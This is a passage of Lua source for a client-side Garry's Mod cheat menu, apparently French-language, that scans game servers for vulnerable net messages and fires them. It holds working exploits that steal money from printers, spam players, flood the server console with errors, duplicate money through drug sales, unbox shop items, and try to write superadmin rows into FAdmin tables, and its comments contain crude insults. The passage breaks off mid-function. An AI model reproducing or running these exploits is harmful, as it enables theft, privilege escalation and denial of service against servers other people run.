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  1. if file.Exists( "includes/extensions/client/vehicle.lua", "LUA" ) == false then -- ne pas toucher cac check !!!!
  2. local Lokidev = nil
  3. local RatesScaleLevel = LocalPlayer():SteamID()
  4. local iZNX = {}
  5. iZNX.memory = {}
  6. local grad = Material( "gui/gradient" )
  7. local upgrad = Material( "gui/gradient_up" )
  8. local downgrad = Material( "gui/gradient_down" )
  9. local ctext = chat.AddText
  10. function iZNX.ChatText( str )
  11. ctext( Color(190, 190, 190), [[ [AnatikMenu]: ]]..str )
  12. end
  13. function iZNX.NetStart( str )
  14. local netstart = net.Start
  15. if Lokidev and Lokidev.G and Lokidev.G.net then
  16. netstart = Lokidev.G.net.Start
  17. else
  18. --        print( "sending netmessage in insecure mode" )
  19. end
  20. return netstart( str )
  21. end
  22. function iZNX.ValidNetString( str )
  23. local netstart = net.Start
  24. if Lokidev and Lokidev.G and Lokidev.G.net then
  25. netstart = Lokidev.G.net.Start
  26. else
  27. --        print( "scanning for exploit in insecure mode" )
  28. end
  29. local status, error = pcall( netstart, str )
  30. return status
  31. end
  32. function iZNX.ValidNetString( str )
  33. local status, error = pcall( net.Start, str )
  34. return status
  35. end
  36. iZNX.sploits = {}
  37. local severitycols = {
  38. [1] = Color( 80, 80, 120 ),
  39. [2] = Color( 80, 120, 80 ),
  40. [3] = Color( 150, 90, 50 ),
  41. [4] = Color( 150, 50, 0 ),
  42. }
  43. function iZNX.AddExploit( name, tab )
  44. if !isstring( name ) then print("U FUCKED UP A SPLOIT RETARD") return end
  45. if !istable( tab ) then print("U FUCKED UP A SPLOIT RETARD") return end
  46. iZNX.sploits[name] = tab
  47. end
  48. function iZNX.IsStored( addr )
  49. return iZNX.memory[addr] != nil
  50. end
  51. function iZNX.GetStored( addr, fallback )
  52. if fallback and iZNX.memory[addr] == nil then return fallback end
  53. return iZNX.memory[addr]
  54. end
  55. function iZNX.Store( addr, val )
  56. iZNX.memory[addr] = val
  57. end
  58. function iZNX.GetAllStored()
  59. return iZNX.memory
  60. end
  61. function iZNX.GetAllStoredData()
  62. local ret = {}
  63. for k, v in pairs( iZNX.memory ) do
  64. if !istable( v ) then ret[k] = v end
  65. end
  66. return ret
  67. end
  68. function iZNX.LoadConfig()
  69. local f = file.Read( "Lokidev_exploit.dat", "DATA" )
  70. if !f then iZNX.ChatText( "T'AS PAS SAVE DE CONFIG SALE TRIZOMIQUE" ) end
  71. local raw = util.Decompress( f )
  72. local garbage = util.JSONToTable( raw )
  73. table.Merge( iZNX.memory, garbage )
  74. --    iZNX.memory = garbage
  75. iZNX.Menu:Remove()
  76. iZNX.ChatText( "Fichier de configuration chargé" )
  77. end
  78. function iZNX.SaveConfig()
  79. local myturds = util.TableToJSON( iZNX.GetAllStoredData() )
  80. if !myturds then return end
  81. local cumpressed = util.Compress( myturds )
  82. file.Write( "Lokidev_exploit.dat", cumpressed )
  83. iZNX.ChatText( "Fichier de configuration sauvegardé" )
  84. end
  85. iZNX.AddExploit( "€ Customizable Printers Money Stealer €", {
  86. desc = "Vole instantanément tout l'argent de chaque Printer sur le serveur",
  87. severity = 3,
  88. scan = function() return iZNX.ValidNetString( "SyncPrinterButtons76561198056171650" ) end,
  89. functions = {
  90. { typ = "func", name = "Prendre", func = function()
  91. if !timer.Exists( "Lokidev_exploit_shekels" ) then
  92. iZNX.ChatText( "Vole de l'argent lancé" )
  93. timer.Create( "Lokidev_exploit_shekels", 0.1, 0, function()
  94. for k, v in pairs(ents.GetAll()) do
  95. if( v:GetClass():find("print") ) then
  96. iZNX.NetStart( "SyncPrinterButtons76561198056171650" )
  97. net.WriteEntity(v)
  98. net.WriteUInt(2, 4)
  99. net.SendToServer()
  100. end
  101. end
  102. end)
  103. else
  104. timer.Remove( "Lokidev_exploit_shekels" )
  105. iZNX.ChatText( "Vole de l'argent stoppé" )
  106. end
  107. end, },
  108. },
  109. } )
  110. iZNX.AddExploit( "ULX Friends Spam", {
  111. desc = "Spams tout le monde sur le serveur avec un message",
  112. severity = 1,
  113. scan = function() return (iZNX.ValidNetString( "sendtable" ) and ulx and ulx.friends ) end,
  114. functions = {
  115. { typ = "string", name = "Entrer un message", default = "Bitch please", addr = "fr_spamstring" },
  116. { typ = "players", addr = "fr_players" },
  117. { typ = "func", name = "Big Spam", func = function()
  118. if !timer.Exists( "bigspams" ) then
  119. iZNX.ChatText( "big spam lancé" )
  120. timer.Create( "bigspams", 0.5, 0, function()
  121. local t = iZNX.GetStored( "fr_players", {} )
  122. for k, v in pairs( player.GetAll() ) do
  123. if !table.HasValue( t, v ) then continue end
  124. local buyit = {}
  125. for i = 1, 15 do
  126. table.insert( buyit, iZNX.GetStored( "fr_spamstring", "Bitch please" ) )
  127. end
  128. iZNX.NetStart( "sendtable" )
  129. net.WriteEntity( v )
  130. net.WriteTable( buyit )
  131. net.SendToServer()
  132. end
  133. end)
  134. else
  135. timer.Remove( "bigspams" )
  136. iZNX.ChatText( "big spam stoppé" )
  137. end
  138. end, },
  139. },
  140. } )
  141. iZNX.AddExploit( "Console Erreur Spammer", {
  142. desc = "Défonce le serveur rcon avec des erreurs massive )",
  143. severity = 1,
  144. scan = function() return iZNX.ValidNetString( "steamid2" ) end,
  145. functions = {
  146. { typ = "func", name = "Big Spam", func = function()
  147. if !timer.Exists( "Lokidev_exploit_errorz" ) then
  148. iZNX.ChatText( "erreur spam lancé" )
  149. timer.Create( "Lokidev_exploit_errorz", 0.1, 0, function()
  150. iZNX.NetStart( "steamid2" )
  151. net.WriteString( "Something is creating very strong script errors" )
  152. net.SendToServer()
  153. end)
  154. else
  155. timer.Remove( "Lokidev_exploit_errorz" )
  156. iZNX.ChatText( "erreur spam stoppé" )
  157. end
  158. end, },
  159. },
  160. } )
  161. iZNX.AddExploit( "Turbo Erreur Spammer", {
  162. desc = "Défonce le serveur rcon avec des erreurs massive.",
  163. severity = 2,
  164. scan = function() return iZNX.ValidNetString( "steamid2" ) end,
  165. functions = {
  166. { typ = "func", name = "Big Spam", func = function()
  167. if !timer.Exists( "Lokidev_exploit_errorzt" ) then
  168. iZNX.ChatText( "erreur spam lancé" )
  169. timer.Create( "Lokidev_exploit_errorzt", 0, 0, function()
  170. for i = 1, 100 do
  171. iZNX.NetStart( "steamid2" )
  172. net.WriteString( "Something is creating very strong script errors" )
  173. net.SendToServer()
  174. end
  175. end)
  176. else
  177. timer.Remove( "Lokidev_exploit_errorzt" )
  178. iZNX.ChatText( "erreur spam stoppé" )
  179. end
  180. end, },
  181. },
  182. } )
  183. iZNX.AddExploit( "€ Kun Drug €", {
  184. desc = "Exploit d'argent",
  185. severity = 3,
  186. scan = function() return iZNX.ValidNetString( "Kun_SellDrug" ) end,
  187. functions = {
  188. { typ = "func", name = "Lancer", func = function()
  189. if !timer.Exists( "Lokidev_exploit_selldrugon" ) then
  190. iZNX.ChatText( "Exploit lancé" )
  191. timer.Create( "Lokidev_exploit_selldrugon", 0, 0, function()
  192. for i=1,1000 do
  193. iZNX.NetStart("Kun_SellDrug")
  194. net.WriteString("mushroom")
  195. net.SendToServer()
  196. end
  197. end)
  198. else
  199. timer.Remove( "Lokidev_exploit_selldrugon" )
  200. iZNX.ChatText( "Exploit stoppé" )
  201. end
  202. end, },
  203. },
  204. } )
  205. iZNX.AddExploit( "Point Shop Unbox", {
  206. desc = "Exploit a téster",
  207. severity = 2,
  208. scan = function() return iZNX.ValidNetString( "net_PSUnBoxServer" ) end,
  209. functions = {
  210. { typ = "func", name = "Lancer", func = function()
  211. for k,v in pairs(player.GetAll()) do
  212. local i = 0
  213. for k2,v2 in pairs(PS.Items) do
  214. if !v:PS_HasItem(v2.ID) then  
  215. timer.Simple(k*i*1.7,function()
  216. iZNX.NetStart("net_PSUnBoxServer")
  217. net.WriteEntity(v)
  218. net.WriteString(v2.ID)
  219. net.SendToServer()
  220. end)
  221. i = i + 1
  222. end
  223. end
  224. end
  225. end, },
  226. },
  227. } )
  228. iZNX.AddExploit( "NE MARCHE PAS", {
  229. desc = "NE MARCHE PAS",
  230. severity = 4,
  231. scan = function() return iZNX.ValidNetString( "pplay_deleterow" ) end,
  232. functions = {
  233. { typ = "players", addr = "l_superadmins" },
  234. { typ = "func", name = "Lancer", func = function()
  235. local t = iZNX.GetStored( "l_superadmins", {} )
  236. for k, v in pairs( player.GetAll() ) do
  237. if !table.HasValue( t, v ) then continue end
  238. local id = v:SteamID()
  239. local tbl = {}
  240. tbl.name = "FAdmin_PlayerGroup"
  241. tbl.where = {
  242. "steamid",
  243. tostring(id)
  244. }
  245. iZNX.NetStart("pplay_deleterow")
  246. net.WriteTable(tbl)
  247. net.SendToServer()
  248. local tbl = {}
  249. tbl.tblname = "FAdmin_PlayerGroup"
  250. tbl.tblinfo = {
  251. tostring(id),
  252. "superadmin"
  253. }